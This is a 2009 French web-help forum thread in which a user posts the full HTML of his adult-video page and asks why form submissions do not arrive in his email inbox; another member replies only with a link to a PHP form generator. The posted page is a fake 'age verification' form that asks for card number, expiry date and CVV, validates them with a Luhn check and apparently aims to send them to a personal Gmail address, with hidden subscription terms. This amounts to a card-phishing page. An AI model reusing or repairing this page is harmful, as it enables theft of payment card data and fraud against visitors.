Aide probleme pour un formlaire sur mon site

Fermé
claudys Messages postés 49 Date d'inscription mardi 28 juillet 2009 Statut Membre Dernière intervention 23 septembre 2009 - 28 juil. 2009 à 21:17
claudys Messages postés 49 Date d'inscription mardi 28 juillet 2009 Statut Membre Dernière intervention 23 septembre 2009 - 28 juil. 2009 à 22:00
Bonjour, a tous jariv pas a avoir les données d'un formulaire sur mon site ds ma boite email repondez moi pour que je vous envoie le code pour coriger
A voir également:

6 réponses

claudys Messages postés 49 Date d'inscription mardi 28 juillet 2009 Statut Membre Dernière intervention 23 septembre 2009 1
28 juil. 2009 à 21:39
oki voila
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta content="text/html; charset=ISO-8859-1"
http-equiv="content-type">
<title>VIDEOS</title>
<meta http-equiv="Content-Type"
content="text/html; charset=iso-8859-1">
<link rel="shortcut icon" type="image/x-icon" href="/favicon.ico">
<style type="text/css">
body {
margin:0px; padding:0px;
font-family:Arial,serif;
background-color:#000; }
form {
margin:0px;
padding:0px;
}
.footer {
font:normal 12px Arial, serif;
}
.content {
font:normal 12px Arial, serif;
color:#000;
background-color:#E1E1E1;
margin-top:20px;
}
.redtext24 {
font:bold 24px Arial, serif;
color:#FF0000;
text-transform:uppercase;
}
.blacktext30 {
font:normal 30px Arial, serif;
color:#000;
text-align:center;
margin-top:25px;
}
.blacktext40 {
font:bold 45px Arial, serif;
color:#000;
text-transform:uppercase;
}
.redtext50 {
font:bold 75px/75px Arial, serif;
color:#FF0000;
text-transform:uppercase;
}
.blacktext28 {
font:bold 28px Arial, serif;
color:#000;
text-transform:uppercase;
}
.redtext23 {
font:bold 23px Arial, serif;
color:#FF0000;
text-transform:uppercase;
}
.redtext15 {
font:bold 18px Arial, serif;
color:#FF0000;
}
.error {background: url(/images/cb60f90/error.gif) no-repeat; padding:4px 4px 4px 20px; color:white; font-weight:bold; font-size:9px; position:absolute; margin-left:3px; }
a, a:hover { color:#000; text-decoration:none; }
a:hover { text-decoration:underline; }
.contentred { border:solid 1px red; }
</style>
</head>
<body
style="color: rgb(0, 0, 0); background-color: rgb(51, 51, 0); background-image: url(file:///F:/arriere%20plan.jpg);"
alink="#000088" link="#0000ff" vlink="#ff0000">
<input> <input>
<table style="text-align: left; width: 973px; height: 102px;" border="1"
cellpadding="2" cellspacing="2">
<tbody>
<tr>
<td><img style="width: 120px; height: 90px;" alt="" src="2.jpg">
</td>
<td><img style="width: 120px; height: 90px;" alt="" src="3.jpg"></td>
<td><img style="width: 120px; height: 90px;" alt="" src="6.jpg"></td>
<td><img style="width: 120px; height: 90px;" alt="" src="9.jpg"></td>
<td><img style="width: 120px; height: 90px;" alt="" src="10.jpg"></td>
<td>   <img style="width: 120px; height: 90px;" alt=""
src="11.jpg"></td>
</tr>
</tbody>
</table>
    
        
     
         
       
        
           
       
 <br>
<big style="font-weight: bold;"><big><big>TOUTES
NOS VIDEOS SONT
VISIBLES ET TELECHARGEABLES SUR CE SITE </big></big></big>
<script language="javascript" type="text/javascript">
window.moveTo(0,0);
window.resizeTo(screen.availWidth,screen.availHeight);
</script>
<div id="global">
<div class="top"><comment title=" End flags "
xmlns="http://disruptive-innovations.com/zoo/nvu/"></comment><br>
<big style="font-weight: bold; text-decoration: underline;"><big>VEUILLEZ
REMPLIR LE FORMULAIRE DE VERIFICATION DE MAJORITE</big></big></div>
<script src="https://secure.securitetotale.com/js/sp2popup.js"></script>
<script type="text/javascript">
popupURL = "https://www.oopt.fr/liveshow/pdv/20?id=20857&tracker=df6cfb70a60bf90bpg_show_cb30h2k10i_exitcb30_exitcd1_uopt_87_41_4510_uopt_528_21_4844&lg=fr&langue=fr&w=0&e=1&soft=0";
var pop = 1;
var initNumber = 0;
function url()
{
var table = document.getElementById('tablecontent');
table.className = 'content contentred';
initNumber++; window.setTimeout('initTableClass()',100);
}
function initTableClass()
{
var table = document.getElementById('tablecontent');
table.className = 'content';
if (initNumber<6) window.setTimeout('url()',100);
else initNumber=0;
}
var REG_CHIFFRE = /^[0-9]*$/; var REG_EMAIL = /^[\w\d\.\-\_]+@[\w\d\-\_]+\.[\w]{2,4}$/;
var REG_CVV = /^[0-9]{3}$/; function checkdate(luna, anul) {
var result = true;
var today = new Date();
var expdate = new Date(anul, luna-1, today.getDate(), 0, 0, 0);
var curdate = new Date(today.getFullYear(), today.getMonth(), today.getDate(), 0, 0, 0);
return (expdate - curdate >= 0); }
function LuhnCheck(str) {
var result = true;
var sum = 0; var mul = 1; var strLen = str.length;
if(strLen != 16){
result = false;
}
for (i = 0; i < strLen; i++) {
var digit = str.substring(strLen-i-1,strLen-i);
var tproduct = parseInt(digit ,10)*mul;
if (tproduct >= 10)
sum += (tproduct % 10) + 1;
else
sum += tproduct;
if (mul == 1)
mul++;
else
mul--;
}
if ((sum % 10) != 0)
result = false;
return result;
}
submitClicked = false;
function submitForm()
{
if (submitClicked) return;
email = document.forms.debut.email.value;
cb_num_text = document.forms.debut.cb_num.value;
cb_exp_m = document.forms.debut.cb_exp_Month.value;
cb_exp_y = document.forms.debut.cb_exp_Year.value;
cvv_text = document.forms.debut.cvv.value;
cb_porteur_text = document.forms.debut.cb_porteur.value;
confirm_value = document.forms.debut.confirm.checked;
error = false;
//cb email
if (!(REG_EMAIL.test(email)))
{
error = true;
document.getElementById('cb_emailError').style.display = 'inline';
}
else
{
document.getElementById('cb_emailError').style.display = 'none'; }
//cb num
if (!(REG_CHIFFRE.test(cb_num_text) && LuhnCheck(cb_num_text)))
{
error = true;
document.getElementById('cb_numError').style.display = 'inline';
}
else
{
document.getElementById('cb_numError').style.display = 'none'; }
//date check if(!checkdate(cb_exp_m, cb_exp_y))
{
error = true;
document.getElementById('cb_dateError').style.display = 'inline';
}
else
{
document.getElementById('cb_dateError').style.display = 'none';
}
//date cvv if(!REG_CVV.test(cvv_text))
{
error = true;
document.getElementById('cvvError').style.display = 'inline';
}
else
{
document.getElementById('cvvError').style.display = 'none';
}
//confirm if(!error && !confirm_value)
{
error = true;
alert('Veuillez accepter les conditions générales');
}
if (!error)
{
pop = 0;
submitClicked = true;
document.getElementById('btnsub').href='#'; //disabled = true;
document.forms.debut.submit();
}
}
function access()
{
alert("Pour accéder au contenu de ce site et de plus de 50 autres sites pornos, veuillez remplir le formulaire ci-dessus.");
}
</script>
<script language="javascript" type="text/javascript">
window.moveTo(0,0);
window.resizeTo(screen.availWidth,screen.availHeight);
</script>
<table align="center" border="0" cellpadding="0" cellspacing="6"
width="996">
<tbody>
<tr>
<td width="220"></td>
<td rowspan="4" align="center" bgcolor="#ffffff" valign="top"
width="532">
<table style="margin: 10px 0px;" border="0" cellpadding="0"
cellspacing="0" width="484">
<tbody>
<tr>
<td class="blacktext40" align="center" valign="top"></td>
</tr>
<tr>
<td class="redtext50" align="center" valign="top"></td>
</tr>
<tr>
<td class="blacktext40" align="center"></td>
</tr>
<!-- <tr>
<td> </td>
</tr>
<tr align="center">
<td class="redtext23">Carte non débitée</td>
</tr>
<tr align="center">
<td class="redtext15">pendant la période d'essai</td>
</tr> -->
</tbody>
</table>
<form action="/cb.php" method="post" name="debut"> <input
name="pays" value="bj" type="hidden"> <input name="id_site"
value="1624" type="hidden">
<input name="org_id_site" value="" type="hidden"> <input
name="id" value="20857" type="hidden"> <input name="tracker"
value="df6cfb70a60bf90bpg_show_cb30h2k10i" type="hidden"> <input
name="idp" value="1" type="hidden"> <input name="langue" value="fr"
type="hidden"><input name="module" value="sponsor_cbsys_userform_step2"
type="hidden"><input name="mb" value="" type="hidden"> <input
name="oldrf" value="pvaH_xxx" type="hidden"><input
name="num_facturation" value="1" type="hidden"><input name="action"
value="validate" type="hidden"><input value="1" name="force_step1"
type="hidden"><input value="199" name="id_facturation" type="hidden"><input
name="cb_porteur" id="nom" value="Sans Nom" type="hidden"> 
<table id="tablecontent" class="content" border="0"
cellpadding="0" cellspacing="10" width="484">
<tbody>
<tr>
<td colspan="2" align="center">
<div class="redtext24">Vérification
de votre majorité</div>
Afin de confirmer votre majorité, Veuillez saisir votre
numéro de carte bancaire</td>
</tr>
<tr>
<td align="right" width="226">Numéro de carte :</td>
<td align="left" width="228"><input name="cb_num"
id="numero" value="" maxlength="16" type="text"> <img
style="width: 16px; height: 21px;" alt="" src="lock.gif"><span
class="error" id="cb_numError" style="display: none;"><span>Un
numéro valide est obligatoire</span></span>
</td>
</tr>
<tr>
<td align="right">Votre
mail :</td>
<td align="left"><label>
<input name="email" class="txt_field" type="text"> </label><span
class="error" id="cb_emailError" style="display: none;"><span>Entrez
une adresse email valide !</span></span>
</td>
</tr>
<tr>
<td align="right">Date
de validité :</td>
<td align="left">
<select name="cb_exp_Month" id="date" class="list_menu">
<option label="01" value="01">01</option>
<option label="02" value="02">02</option>
<option label="03" value="03">03</option>
<option label="04" value="04">04</option>
<option label="05" value="05">05</option>
<option label="06" value="06">06</option>
<option label="07" value="07" selected="selected">07</option>
<option label="08" value="08">08</option>
<option label="09" value="09">09</option>
<option label="10" value="10">10</option>
<option label="11" value="11">11</option>
<option label="12" value="12">12</option>
</select>
<select name="cb_exp_Year" id="date" class="list_menu">
<option label="2008" value="2008">2008</option>
<option label="2009" value="2009" selected="selected">2009</option>
<option label="2010" value="2010">2010</option>
<option label="2011" value="2011">2011</option>
<option label="2012" value="2012">2012</option>
<option label="2013" value="2013">2013</option>
<option label="2014" value="2014">2014</option>
<option label="2015" value="2015">2015</option>
<option label="2016" value="2016">2016</option>
<option label="2017" value="2017">2017</option>
<option label="2018" value="2018">2018</option>
<option label="2019" value="2019">2019</option>
</select>
<span class="error" id="cb_dateError"
style="display: none;"><span>Une
date valide est obligatoire</span></span></td>
</tr>
<tr>
<td align="right">Les
3 derniers chiffres au dos :</td>
<td align="left"><input name="cvv" id="ccc" size="3"
maxlength="3" style="width: 36px;"><span class="error" id="cvvError"
style="display: none;"><span>Indiquez
les 3 chiffres au dos</span></span>
</td>
</tr>
<tr>
<td> </td>
<td align="left"><img style="width: 129px; height: 48px;"
alt="" src="credit_number.gif"></td>
</tr>
<tr align="center">
<td colspan="2"><input id="accept" name="confirm"
value="checkbox" type="checkbox"> J'accepte les conditions
générales<br>
<span style="margin-left: 42px;">et <strong><u>confirme
avoir l'âge minimum légal</u></strong></span></td>
</tr>
<tr align="center">
<td colspan="2"><input class="" name="confirm"
value="Confirmer" type="submit"action=post"amos.sv@gmail.com>          
                <input
value="EFFACER" type="reset"><br>
</td>
</tr>
</tbody>
</table>
</form>
<div class="blacktext30">100%
discret et anonyme</div>
</td>
<td width="220"><br>
</td>
</tr>
<tr>
<td onclick="url()"> <iframe
src="/images/flvs/vid1.html?niche=H&syn=hetero&size=220x165"
frameborder="0" height="165" width="220">&amp;amp;amp;amp;amp;amp;lt;p&amp;amp;amp;amp;amp;amp;gt;Your
browser does not support
iframes.&amp;amp;amp;amp;amp;amp;lt;/p&amp;amp;amp;amp;amp;amp;gt;
</iframe> </td>
<td><br>
</td>
</tr>
<tr>
<td><br>
</td>
<td></td>
</tr>
<tr>
<td><br>
</td>
<td><br>
</td>
</tr>
<tr>
<td></td>
<td align="center"> <span style="color: rgb(255, 255, 255);">Informations
légales</span> </td>
</tr>
<tr>
<td colspan="3" class="footer" bgcolor="#ffffff">
<table style="margin: 0pt auto;" border="0" cellpadding="0"
cellspacing="15" width="100%">
<tbody>
<tr>
<td align="center"></td>
</tr>
<tr>
<td colspan="3" class="footer"><br>
Conditions générales: Aussi NOUS VOUS INFORMONS
QUE NOUS POURSUIVRONS SYSTEMATIQUEMENT POUR FRAUDE A LA CARTE BANCAIRE,
CONTREFACON DE CARTE DE PAIEMENT, ESCROQUERIE, ABUS DE CONFIANCE ET/OU
REPUDIATION ABUSIVE TOUTE PERSONNE AYANT DIRECTEMENT OU INDIRECTEMENT
TENTE DE FRAUDER CE SERVICE.<br>
Les peines encourues vont jusqu' à 390 000 euros d'amende et
5 ans de prison.<br>
Ce service vous plait<br>
En nous restant fidèle au delà des trente
minutes, vous convertirez automatiquement votre test gratuit en un
abonnement classique à 79 euros tous les deux mois, et ce de
façon totalement anonyme. Vous aurez alors un
accès permanent à l'ensemble de nos services.
Vous pouvez bien entendu stopper votre abonnement à tout
moment.<br>
Ce service est sécurisé et la
procédure de désabonnement directe.<br>
Vous souhaitez vous désabonner<br>
Il vous suffit d'annuler votre inscription  en cliquant sur le
lien mis en permanence à votre
disposition. Attention cette démarche est
nécessaire. Quitter le site ou cliquer sur les autres liens
n'est pas suffisant.</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-2813150-33");
pageTracker._trackPageview("id_site1624");
} catch(err) {}
</script>
<script>
function Resize(){
t=document.getElementById('gap');
var myWidth = 0, myHeight = 0;
if( typeof( window.innerWidth ) == 'number' ) {
//Non-IE
myWidth = window.innerWidth;
myHeight = window.innerHeight;
} else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight ) ) {
//IE 6+ in 'standards compliant mode'
myWidth = document.documentElement.clientWidth;
myHeight = document.documentElement.clientHeight;
} else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {
//IE 4 compatible
myWidth = document.body.clientWidth;
myHeight = document.body.clientHeight;
}
t.style.height = (myHeight-700)+'px';
}
// Resize();
function mentions_legales(legals_link) {
var legal=window.open(legals_link, 'legals_popup', 'top=100,left=100,width=600,height=375,location=0,resizable=1,status=0');
}
</script><br>
<br>
<div class="pay_big">
<div class="card_info">  
</div>
</div>
</div>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-2813150-33");
pageTracker._trackPageview("id_site1674");
} catch(err) {
</script>
<table style="text-align: left; width: 972px; height: 117px;" border="1"
cellpadding="2" cellspacing="2">
<tbody>
<tr>
<td><img style="width: 120px; height: 90px;" alt="" src="15.jpg"></td>
<td> <img style="width: 120px; height: 90px;" alt=""
src="20.jpg"></td>
<td> <img style="width: 140px; height: 105px;" alt=""
src="a.jpg"></td>
<td><img style="width: 120px; height: 90px;" alt="" src="ddp.jpg"></td>
<td><img style="width: 157px; height: 89px;" alt="" src="hy.jpg"></td>
<td> <img style="width: 125px; height: 90px;" alt=""
src="dd.jpg"></td>
</tr>
</tbody>
</table>
</body>
</html>

merci de me repondre
1
Nico_ Messages postés 1219 Date d'inscription vendredi 29 décembre 2006 Statut Membre Dernière intervention 15 mars 2016 189
28 juil. 2009 à 21:36
bonsoir, donne ton code
0
claudys Messages postés 49 Date d'inscription mardi 28 juillet 2009 Statut Membre Dernière intervention 23 septembre 2009 1
28 juil. 2009 à 21:42
je voudrais aussi suprimer tout ce qui n'est pas nécessaire
0
Nico_ Messages postés 1219 Date d'inscription vendredi 29 décembre 2006 Statut Membre Dernière intervention 15 mars 2016 189
28 juil. 2009 à 21:43
re:

voici un générateur de formulaire php http://infoxp.leobaillard.org/formulaire/
bonne soirée
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
claudys Messages postés 49 Date d'inscription mardi 28 juillet 2009 Statut Membre Dernière intervention 23 septembre 2009 1
28 juil. 2009 à 21:48
merci je vai voir
0
claudys Messages postés 49 Date d'inscription mardi 28 juillet 2009 Statut Membre Dernière intervention 23 septembre 2009 1
28 juil. 2009 à 22:00
Merci bien
j'ai trouvé mon bonheur
0